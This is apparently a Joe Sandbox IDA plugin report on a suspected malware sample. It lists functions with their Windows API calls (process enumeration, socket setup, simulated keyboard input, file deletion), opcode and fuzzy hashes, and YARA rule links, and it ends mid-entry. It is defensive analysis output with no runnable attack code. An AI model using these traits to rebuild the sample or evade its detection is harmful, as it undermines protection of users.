Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 51a36903b705b438b46181043cdc02e65b5a9dd0345e2dfb0a7e2e0e52199ed6
Instruction ID: fa8a177070e874a745b8109bb26c8e9e4f6e1e3411c05c8a2d98bbf180dc1495
Opcode Fuzzy Hash: 51a36903b705b438b46181043cdc02e65b5a9dd0345e2dfb0a7e2e0e52199ed6
Instruction Fuzzy Hash: BD31A1366002019FCF10CF68C985EA977B0EF94324F26C159E81A8B392D771EE46D760

Function 00A84954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00A849DC
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00A849F0
SendMessageW.USER32(?,00001002,00000000,?), ref: 00A84A14

Strings

SysMonthCal32, xrefs: 00A849A7

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 90c9c872607458c72bf6246243c6a662afc1bcc08ef3146219ca06e4af4ea68b
Instruction ID: 602083f7b11c0fc9eb3e7db7b7cf8f4caee8ffca5f1056d44bff014d0d69a627
Opcode Fuzzy Hash: 90c9c872607458c72bf6246243c6a662afc1bcc08ef3146219ca06e4af4ea68b
Instruction Fuzzy Hash: 6D21BF32610219BBDF25DF94CC46FEB3B69EF48764F110214FE156B0D0D6B5E8519B90

Function 00A850F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00A851A3
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00A851B1
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A851B8

Strings

msctls_updown32, xrefs: 00A85122

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 68c567a0454a6158070fd6cb4e6a4ca223bdf1099210f453100289ee4f725f50
Instruction ID: f111e994986fe05acaa38003490e8d649b4eccddb78c0a9330a7be1c65a22e7e
Opcode Fuzzy Hash: 68c567a0454a6158070fd6cb4e6a4ca223bdf1099210f453100289ee4f725f50
Instruction Fuzzy Hash: E62162B5A00609AFDB10EF64CC85EB737ADEB59364B040159F9049B3A1CB70EC16CBA0

Function 00A84253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00A842DC
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00A842EC
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00A84312

Strings

Listbox, xrefs: 00A842AB

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 95caa58c556beb15505bee59bc26ec00118216496d39fe8d6d9b7f2741fd02c2
Instruction ID: 939edfcdb50c7986922204f2d0337f02a76364131da03d406e0e0cc8f882f533
Opcode Fuzzy Hash: 95caa58c556beb15505bee59bc26ec00118216496d39fe8d6d9b7f2741fd02c2
Instruction Fuzzy Hash: 27218E32614219BBEB11DF94CC85FEB3B6EEF99764F118114F9109B190DA719C528BA0

Function 00A65439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00A6544D
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00A654A1
SetErrorMode.KERNEL32(00000000,?,?,00A8DCD0), ref: 00A65515

Strings

%lu, xrefs: 00A654B4

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 2441f56a79256468536ca1b4db0a633fb16cf1bc96aa169464d449695550a05c
Instruction ID: 7f287d5bf93043c7260659fc2072a25fe0b8284e6efaa1ff644cf6834d074013
Opcode Fuzzy Hash: 2441f56a79256468536ca1b4db0a633fb16cf1bc96aa169464d449695550a05c
Instruction Fuzzy Hash: D1315170A00209AFDB10DF64C985EAA7BF9EF45308F1440A5F949DB2A2DB71EE45CB61

Function 00A84C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00A84CED
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00A84D02
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00A84D0F

Strings

msctls_trackbar32, xrefs: 00A84CC4

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: fddf49e74b6d28cd6ff1778a562252b6216a19edc73c8e2c1b8a078c74901d10
Instruction ID: 1fbbdc8cf19b806ebf42f87de9db8a825e639cfd4a870c9ca9cc48a219168db8
Opcode Fuzzy Hash: fddf49e74b6d28cd6ff1778a562252b6216a19edc73c8e2c1b8a078c74901d10
Instruction Fuzzy Hash: 60112571240249BEEF20AF69CC06FEB7BACEF89B64F110514FA51E20A0C671DC61DB20

Function 00A5389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009F8577: _wcslen.LIBCMT ref: 009F858A

Part of subcall function 00A536F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A53712
Part of subcall function 00A536F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A53723
Part of subcall function 00A536F4: GetCurrentThreadId.KERNEL32 ref: 00A5372A
Part of subcall function 00A536F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00A53731

GetFocus.USER32 ref: 00A538C4

Part of subcall function 00A5373B: GetParent.USER32(00000000), ref: 00A53746

GetClassNameW.USER32(?,?,00000100), ref: 00A5390F
EnumChildWindows.USER32(?,00A53987), ref: 00A53937

Strings

%s%d, xrefs: 00A5394B

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: b8947591eb89aeecd85de586c9beab6df721db11a22d649a6f09d846a4672980
Instruction ID: 0d96dcbc0f616b1d90ae5f5b930134c290f481ae79d326000303bb166869c6a0
Opcode Fuzzy Hash: b8947591eb89aeecd85de586c9beab6df721db11a22d649a6f09d846a4672980
Instruction Fuzzy Hash: A811D5B2600209ABCF11BF749D85AFE776ABFD4344F004079BD099B292DE705909CB20

Function 00A86321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00A86360
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00A8638D
DrawMenuBar.USER32(?), ref: 00A8639C

Strings

0, xrefs: 00A8632E

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 838a8d2e8508f71c8f54f08ab31196b2eab047a9c5d9222eaaec3b2e3a979d67
Instruction ID: 89e0f19679549f768ccdef8e3f387a26d487f1570ca99bbfaf3bd81d08b30cef
Opcode Fuzzy Hash: 838a8d2e8508f71c8f54f08ab31196b2eab047a9c5d9222eaaec3b2e3a979d67
Instruction Fuzzy Hash: 67016D31500218AFEB11AF51DC84FEEBBB5FB44355F10809AE949DA150DF708A85EF21

Function 00A5096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1df13e1b49da1e33d5f4a54b49549815d083c0f49e907c95f5ec558163479493
Instruction ID: a248b8de58314a0796958e35bd0befd347bf203ae5621b652e24d16597cf5c52
Opcode Fuzzy Hash: 1df13e1b49da1e33d5f4a54b49549815d083c0f49e907c95f5ec558163479493
Instruction Fuzzy Hash: 86C17E75A0020AEFDB14CFA8C894EAEB7B5FF48705F118598E905EB251D731EE85CB90

Function 00A241F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00A2427E
__alldvrm.LIBCMT ref: 00A2447F
__alldvrm.LIBCMT ref: 00A244A1

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction ID: 0632b9843712ae62b9747ea3e5ea816c1c77e1cb04151129ac56303b4d3bbcaa
Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction Fuzzy Hash: F4A17772A007A69FDB26DF1CE9917AEBBE4EF19310F2441BDE5959F281C3389841C750

Function 00A50D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00A90BD4,?), ref: 00A50EE0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00A90BD4,?), ref: 00A50EF8
CLSIDFromProgID.OLE32(?,?,00000000,00A8DCE0,000000FF,?,00000000,00000800,00000000,?,00A90BD4,?), ref: 00A50F1D
_memcmp.LIBVCRUNTIME ref: 00A50F3E

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: d330a0caa8769162cd8dabaf46f77f5185c3b160b9fb3ae182d6547c31cd5755
Instruction ID: db925fbb07d24f9f543beeacc0987e39678cd3e772c6c4f98af662382ca2ea35
Opcode Fuzzy Hash: d330a0caa8769162cd8dabaf46f77f5185c3b160b9fb3ae182d6547c31cd5755
Instruction Fuzzy Hash: 8B81F975A00109EFCB14DF94C984EEEB7B9FF89315F204558F906AB250DB71AE0ACB60

Function 00A7B0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00A7B10C
Process32FirstW.KERNEL32(00000000,?), ref: 00A7B11A

Part of subcall function 009FB329: _wcslen.LIBCMT ref: 009FB333

Process32NextW.KERNEL32(00000000,?), ref: 00A7B1FC
CloseHandle.KERNEL32(00000000), ref: 00A7B20B

Part of subcall function 00A0E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00A34D73,?), ref: 00A0E395

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 67c7654e9031cb5fa142695e0dcbaeb7bdfc9df14ba0f852e3acaa541ca25da1
Instruction ID: 83c9632c8d198cabfde9a820d54a4e39165320b2bc9197655256d8a368314fb9
Opcode Fuzzy Hash: 67c7654e9031cb5fa142695e0dcbaeb7bdfc9df14ba0f852e3acaa541ca25da1
Instruction Fuzzy Hash: BF514AB1508304AFD310EF24C886A6BBBE8FF89754F40891DF589972A1EB70D905CB92

Function 00A31711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00A31840

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ae240c9a0522e0c158c74ee4df45ff5a9784838a4778f0f6f005d8d2bfb17a26
Instruction ID: 8579b3a0c8d1b55e1402b32115efef6da4aa5664b6296be39daa67561b53f43b
Opcode Fuzzy Hash: ae240c9a0522e0c158c74ee4df45ff5a9784838a4778f0f6f005d8d2bfb17a26
Instruction Fuzzy Hash: A4414931A00150AFDB257FBD9D46AFE3AB4EF45770F180635F828D6291EB3548424BA5

Function 00A72533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00A7255A
WSAGetLastError.WSOCK32 ref: 00A72568
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00A725E7
WSAGetLastError.WSOCK32 ref: 00A725F1

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: d3b4a4272f2b3171b1fbc30e5b0c05dabbe4532e5bf68eba979d9fbf80b05c37
Instruction ID: 0e7e2d5d35e1a564c40e671cdf942fba5a78d5d7495e0d6ea758f76f100538f2
Opcode Fuzzy Hash: d3b4a4272f2b3171b1fbc30e5b0c05dabbe4532e5bf68eba979d9fbf80b05c37
Instruction Fuzzy Hash: 5341A374A00204AFE720AF24C886F6A77E5EB44758F54C458FA5A9F2D2D772ED42CB90

Function 00A86CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00A86D1A
ScreenToClient.USER32(?,?), ref: 00A86D4D
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00A86DBA

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 59fae18ca68ef7034897710c73a22aacc25f6136f82adff2a9dfa62669d96bea
Instruction ID: 1960a804c7767b24d404c1d32e8d36d373b674553e9e1f037473f1b3c479c7e2
Opcode Fuzzy Hash: 59fae18ca68ef7034897710c73a22aacc25f6136f82adff2a9dfa62669d96bea
Instruction Fuzzy Hash: 0B512F74A00609EFDF24EFA4D980AAE7BB6FF44360F108559F9559B290D770ED81CB50

Function 00A2B79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f401bf3dfc96dfcdadca344a5c0111a298151fbf299dd9d85990419a15dff3b
Instruction ID: e3a24e17f5c02cad7b181720ef5fe0abe90429fd61730479d084238d00e4a51a
Opcode Fuzzy Hash: 5f401bf3dfc96dfcdadca344a5c0111a298151fbf299dd9d85990419a15dff3b
Instruction Fuzzy Hash: D7412671A10754BFD724AF7CED41BAABBECEB88710F10853AF115DB291D371A94187A0

Function 00A6611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00A661C8
GetLastError.KERNEL32(?,00000000), ref: 00A661EE
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00A66213
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00A6623F

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 0d500c136ade507a23c4f73cbe3fa39b51f24a79ccaeeaaa1a8194518c5447e4
Instruction ID: 0f0a0c6140c9db3ac7648d3f54cf21f5045c00371a6c754a29f1414e04b5cef6
Opcode Fuzzy Hash: 0d500c136ade507a23c4f73cbe3fa39b51f24a79ccaeeaaa1a8194518c5447e4
Instruction Fuzzy Hash: 6D414E35600615DFCF11EF54C545A6EBBF2EF89720B188488E94AAB3A2CB30FD01CB91

Function 00A5B41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00A5B473
SetKeyboardState.USER32(00000080), ref: 00A5B48F
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00A5B4FD
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00A5B54F

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 275f6760852ee5132040060fabdbcd37301956d29289d42d8c8814da3958f053
Instruction ID: 5dbc40576c2d8bdfb87a42b2c944d6f8cecd3e0216e8d7c6abe2c9411fe286bc
Opcode Fuzzy Hash: 275f6760852ee5132040060fabdbcd37301956d29289d42d8c8814da3958f053
Instruction Fuzzy Hash: FE313770A60208AEFF34CB648805BFA7BB5BB58313F04421AE896961D2D374894AC772

Function 00A5B563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 00A5B5B8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00A5B5D4
PostMessageW.USER32(00000000,00000101,00000000), ref: 00A5B63B
SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 00A5B68D

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
